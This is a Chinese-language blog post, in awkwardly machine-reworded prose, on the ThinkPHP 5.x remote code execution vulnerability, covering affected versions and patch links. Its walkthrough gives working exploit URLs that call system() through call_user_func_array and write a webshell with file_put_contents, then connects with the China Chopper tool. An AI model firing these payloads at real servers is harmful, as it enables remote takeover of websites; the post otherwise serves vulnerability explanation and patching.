让知识连接你我
投稿赚钱
当前位置: 首页 > 后端开发 > ThinkPHP远程代码执行漏洞
  • 101
  • 微信分享

    扫一扫,在手机上查看

ThinkPHP远程代码执行漏洞

2019.09.12 10:00 254 浏览 举报

  ThinkPHP是一个迅速、简洁明了的根据MVC和面向对象设计的重量级PHP开发设计框架结构。

  Thinkphp5.x版本中存有一个比较严重的远程代码执行安全漏洞。这些安全漏洞的关键缘由是由于框架结构对控制模块名都没有开展充足的校正造成在都没有打开强制路由的状况下能够结构恶意语句实行远程命令

  影响标准

  Thinkphp 5.1.0 - 5.1.31

  Thinkphp 5.0.5 - 5.0.23

  漏洞利用

  环境介绍:

  thinkphp5.0.22+php5.4.45+ apache2.4.23

  1.首要构建好相应的环境,访问页面给出:

1568268428568641 (2).jpg

  2.当见到框架结构为thinkphp5.x时,人们必须的也是验证是不是存有远程代码执行安全漏洞

  http:// localhost/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

1568268429838429 (2).jpg

  3.确定在这里存有远程代码执行后,载入shell

  http:// localhost/public/index.php?s =index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=

1568268429596697 (2).jpg

  4.勇于尝试用菜刀开展接入,接入取得成功

1568268429555879 (2).jpg

  或许在这里人们也能够选用直接上传大马

1568268430503792 (2).jpg

  相较手工,人们也能够选用工具直接getshell全是能够的

1568268430646321 (2).jpg

  修复建议

  1、重新安装:

  Thinkphp v5.0.x补丁地址:

  https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

  Thinkphp v5.1.x补丁地址:

  https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

  2、更新框架结构

  参考链接

  exploit地址:

  https://www.exploit-db.com/exploits/45978

  框架下载地址:

  http://www.thinkphp.cn/donate/download/id/1125.html

  docker漏洞环境源码:

  https://github.com/vulnspy/thinkphp-5.1.29

  https://www.gendan5.com


本文首次发布于开创者素材 ,转载请注明出处,谢谢合作!

相关文章推荐